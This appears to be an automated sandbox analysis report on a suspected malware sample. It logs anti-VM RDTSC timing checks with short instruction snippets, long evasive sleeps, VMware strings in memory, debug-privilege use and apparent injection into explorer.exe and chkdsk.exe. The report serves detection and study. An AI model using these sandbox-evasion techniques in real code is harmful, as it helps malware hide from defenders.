Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\881SP1exr1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: 881SP1exr1.exe PID: 7264, type: MEMORYSTR

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\881SP1exr1.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\881SP1exr1.exe	RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 0000000005049904 second address: 000000000504990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: 0000000005049B6E second address: 0000000005049B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_3-13929

Source: C:\Users\user\Desktop\881SP1exr1.exe TID: 7288	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7996	Thread sleep count: 9626 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7996	Thread sleep time: -19252000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7996	Thread sleep count: 315 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7996	Thread sleep time: -630000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 7604	Thread sleep count: 178 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 7604	Thread sleep time: -356000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 7604	Thread sleep count: 9790 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 7604	Thread sleep time: -19580000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\881SP1exr1.exe

Code function: 2_2_00409AA0 rdtsc

2_2_00409AA0

Source: C:\Users\user\Desktop\881SP1exr1.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 9626	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 874	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 876	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Window / User API: threadDelayed 9790	Jump to behavior

Source: C:\Users\user\Desktop\881SP1exr1.exe	API coverage: 1.7 %
Source: C:\Windows\SysWOW64\chkdsk.exe	API coverage: 1.8 %

Source: C:\Users\user\Desktop\881SP1exr1.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\881SP1exr1.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: explorer.exe, 00000003.00000002.4095376917.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000003.00000002.4094650297.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000003.00000002.4094650297.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000003.00000002.4095376917.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000003.00000000.1645900730.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000003.00000002.4092507766.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.1652554894.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000003.00000002.4094650297.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000003.00000002.4094650297.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1650634865.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106395909.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1650634865.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4094650297.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106395909.000000000982D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000000.1652554894.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000003.00000002.4092507766.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000003.00000000.1650634865.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000003.00000000.1645900730.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000003.00000000.1645900730.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\881SP1exr1.exe

Code function: 2_2_00409AA0 rdtsc

2_2_00409AA0

Source: C:\Users\user\Desktop\881SP1exr1.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A4144 mov eax, dword ptr fs:[00000030h]	2_2_014A4144
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A4144 mov eax, dword ptr fs:[00000030h]	2_2_014A4144
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A4144 mov ecx, dword ptr fs:[00000030h]	2_2_014A4144
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A4144 mov eax, dword ptr fs:[00000030h]	2_2_014A4144
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A4144 mov eax, dword ptr fs:[00000030h]	2_2_014A4144
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A8158 mov eax, dword ptr fs:[00000030h]	2_2_014A8158
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01416154 mov eax, dword ptr fs:[00000030h]	2_2_01416154
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01416154 mov eax, dword ptr fs:[00000030h]	2_2_01416154
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140C156 mov eax, dword ptr fs:[00000030h]	2_2_0140C156
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E4164 mov eax, dword ptr fs:[00000030h]	2_2_014E4164
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E4164 mov eax, dword ptr fs:[00000030h]	2_2_014E4164
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BE10E mov eax, dword ptr fs:[00000030h]	2_2_014BE10E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BE10E mov ecx, dword ptr fs:[00000030h]	2_2_014BE10E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BE10E mov eax, dword ptr fs:[00000030h]	2_2_014BE10E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BE10E mov eax, dword ptr fs:[00000030h]	2_2_014BE10E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BE10E mov ecx, dword ptr fs:[00000030h]	2_2_014BE10E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BE10E mov eax, dword ptr fs:[00000030h]	2_2_014BE10E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BE10E mov eax, dword ptr fs:[00000030h]	2_2_014BE10E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BE10E mov ecx, dword ptr fs:[00000030h]	2_2_014BE10E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BE10E mov eax, dword ptr fs:[00000030h]	2_2_014BE10E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BE10E mov ecx, dword ptr fs:[00000030h]	2_2_014BE10E
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BA118 mov ecx, dword ptr fs:[00000030h]	2_2_014BA118
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BA118 mov eax, dword ptr fs:[00000030h]	2_2_014BA118
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BA118 mov eax, dword ptr fs:[00000030h]	2_2_014BA118
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BA118 mov eax, dword ptr fs:[00000030h]	2_2_014BA118
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014D0115 mov eax, dword ptr fs:[00000030h]	2_2_014D0115
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01440124 mov eax, dword ptr fs:[00000030h]	2_2_01440124
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014D61C3 mov eax, dword ptr fs:[00000030h]	2_2_014D61C3
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014D61C3 mov eax, dword ptr fs:[00000030h]	2_2_014D61C3
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148E1D0 mov eax, dword ptr fs:[00000030h]	2_2_0148E1D0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148E1D0 mov eax, dword ptr fs:[00000030h]	2_2_0148E1D0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148E1D0 mov ecx, dword ptr fs:[00000030h]	2_2_0148E1D0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148E1D0 mov eax, dword ptr fs:[00000030h]	2_2_0148E1D0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0148E1D0 mov eax, dword ptr fs:[00000030h]	2_2_0148E1D0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E61E5 mov eax, dword ptr fs:[00000030h]	2_2_014E61E5
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014401F8 mov eax, dword ptr fs:[00000030h]	2_2_014401F8
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01450185 mov eax, dword ptr fs:[00000030h]	2_2_01450185
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014CC188 mov eax, dword ptr fs:[00000030h]	2_2_014CC188
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014CC188 mov eax, dword ptr fs:[00000030h]	2_2_014CC188
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B4180 mov eax, dword ptr fs:[00000030h]	2_2_014B4180
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B4180 mov eax, dword ptr fs:[00000030h]	2_2_014B4180
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149019F mov eax, dword ptr fs:[00000030h]	2_2_0149019F
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149019F mov eax, dword ptr fs:[00000030h]	2_2_0149019F
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149019F mov eax, dword ptr fs:[00000030h]	2_2_0149019F
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149019F mov eax, dword ptr fs:[00000030h]	2_2_0149019F
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140A197 mov eax, dword ptr fs:[00000030h]	2_2_0140A197
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140A197 mov eax, dword ptr fs:[00000030h]	2_2_0140A197
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140A197 mov eax, dword ptr fs:[00000030h]	2_2_0140A197
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01412050 mov eax, dword ptr fs:[00000030h]	2_2_01412050
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01496050 mov eax, dword ptr fs:[00000030h]	2_2_01496050
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0143C073 mov eax, dword ptr fs:[00000030h]	2_2_0143C073
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01494000 mov ecx, dword ptr fs:[00000030h]	2_2_01494000
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B2000 mov eax, dword ptr fs:[00000030h]	2_2_014B2000
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B2000 mov eax, dword ptr fs:[00000030h]	2_2_014B2000
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B2000 mov eax, dword ptr fs:[00000030h]	2_2_014B2000
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B2000 mov eax, dword ptr fs:[00000030h]	2_2_014B2000
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B2000 mov eax, dword ptr fs:[00000030h]	2_2_014B2000
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B2000 mov eax, dword ptr fs:[00000030h]	2_2_014B2000
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B2000 mov eax, dword ptr fs:[00000030h]	2_2_014B2000
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B2000 mov eax, dword ptr fs:[00000030h]	2_2_014B2000
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0142E016 mov eax, dword ptr fs:[00000030h]	2_2_0142E016
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0142E016 mov eax, dword ptr fs:[00000030h]	2_2_0142E016
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0142E016 mov eax, dword ptr fs:[00000030h]	2_2_0142E016
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0142E016 mov eax, dword ptr fs:[00000030h]	2_2_0142E016
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140A020 mov eax, dword ptr fs:[00000030h]	2_2_0140A020
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140C020 mov eax, dword ptr fs:[00000030h]	2_2_0140C020
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A6030 mov eax, dword ptr fs:[00000030h]	2_2_014A6030
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014920DE mov eax, dword ptr fs:[00000030h]	2_2_014920DE
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0140A0E3
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014180E9 mov eax, dword ptr fs:[00000030h]	2_2_014180E9
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014960E0 mov eax, dword ptr fs:[00000030h]	2_2_014960E0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0140C0F0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014520F0 mov ecx, dword ptr fs:[00000030h]	2_2_014520F0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141208A mov eax, dword ptr fs:[00000030h]	2_2_0141208A
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014080A0 mov eax, dword ptr fs:[00000030h]	2_2_014080A0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014A80A8 mov eax, dword ptr fs:[00000030h]	2_2_014A80A8
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014D60B8 mov eax, dword ptr fs:[00000030h]	2_2_014D60B8
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014D60B8 mov ecx, dword ptr fs:[00000030h]	2_2_014D60B8
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]	2_2_01492349
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]	2_2_01492349
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]	2_2_01492349
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]	2_2_01492349
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]	2_2_01492349
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]	2_2_01492349
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]	2_2_01492349
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]	2_2_01492349
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]	2_2_01492349
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]	2_2_01492349
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]	2_2_01492349
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]	2_2_01492349
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]	2_2_01492349
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]	2_2_01492349
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01492349 mov eax, dword ptr fs:[00000030h]	2_2_01492349
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E634F mov eax, dword ptr fs:[00000030h]	2_2_014E634F
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149035C mov eax, dword ptr fs:[00000030h]	2_2_0149035C
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149035C mov eax, dword ptr fs:[00000030h]	2_2_0149035C
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149035C mov eax, dword ptr fs:[00000030h]	2_2_0149035C
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149035C mov ecx, dword ptr fs:[00000030h]	2_2_0149035C
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149035C mov eax, dword ptr fs:[00000030h]	2_2_0149035C
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0149035C mov eax, dword ptr fs:[00000030h]	2_2_0149035C
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B8350 mov ecx, dword ptr fs:[00000030h]	2_2_014B8350
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014DA352 mov eax, dword ptr fs:[00000030h]	2_2_014DA352
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B437C mov eax, dword ptr fs:[00000030h]	2_2_014B437C
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144A30B mov eax, dword ptr fs:[00000030h]	2_2_0144A30B
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144A30B mov eax, dword ptr fs:[00000030h]	2_2_0144A30B
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0144A30B mov eax, dword ptr fs:[00000030h]	2_2_0144A30B
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0140C310 mov ecx, dword ptr fs:[00000030h]	2_2_0140C310
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_01430310 mov ecx, dword ptr fs:[00000030h]	2_2_01430310
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E8324 mov eax, dword ptr fs:[00000030h]	2_2_014E8324
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E8324 mov ecx, dword ptr fs:[00000030h]	2_2_014E8324
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E8324 mov eax, dword ptr fs:[00000030h]	2_2_014E8324
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014E8324 mov eax, dword ptr fs:[00000030h]	2_2_014E8324
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014CC3CD mov eax, dword ptr fs:[00000030h]	2_2_014CC3CD
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0141A3C0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0141A3C0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0141A3C0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0141A3C0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0141A3C0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0141A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0141A3C0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014183C0 mov eax, dword ptr fs:[00000030h]	2_2_014183C0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014183C0 mov eax, dword ptr fs:[00000030h]	2_2_014183C0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014183C0 mov eax, dword ptr fs:[00000030h]	2_2_014183C0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014183C0 mov eax, dword ptr fs:[00000030h]	2_2_014183C0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014963C0 mov eax, dword ptr fs:[00000030h]	2_2_014963C0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BE3DB mov eax, dword ptr fs:[00000030h]	2_2_014BE3DB
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BE3DB mov eax, dword ptr fs:[00000030h]	2_2_014BE3DB
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BE3DB mov ecx, dword ptr fs:[00000030h]	2_2_014BE3DB
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014BE3DB mov eax, dword ptr fs:[00000030h]	2_2_014BE3DB
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B43D4 mov eax, dword ptr fs:[00000030h]	2_2_014B43D4
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014B43D4 mov eax, dword ptr fs:[00000030h]	2_2_014B43D4
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014203E9 mov eax, dword ptr fs:[00000030h]	2_2_014203E9
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014203E9 mov eax, dword ptr fs:[00000030h]	2_2_014203E9
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014203E9 mov eax, dword ptr fs:[00000030h]	2_2_014203E9
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014203E9 mov eax, dword ptr fs:[00000030h]	2_2_014203E9
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014203E9 mov eax, dword ptr fs:[00000030h]	2_2_014203E9
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014203E9 mov eax, dword ptr fs:[00000030h]	2_2_014203E9
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014203E9 mov eax, dword ptr fs:[00000030h]	2_2_014203E9
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_014203E9 mov eax, dword ptr fs:[00000030h]	2_2_014203E9
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0142E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0142E3F0
Source: C:\Users\user\Desktop\881SP1exr1.exe	Code function: 2_2_0142E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0142E3F0
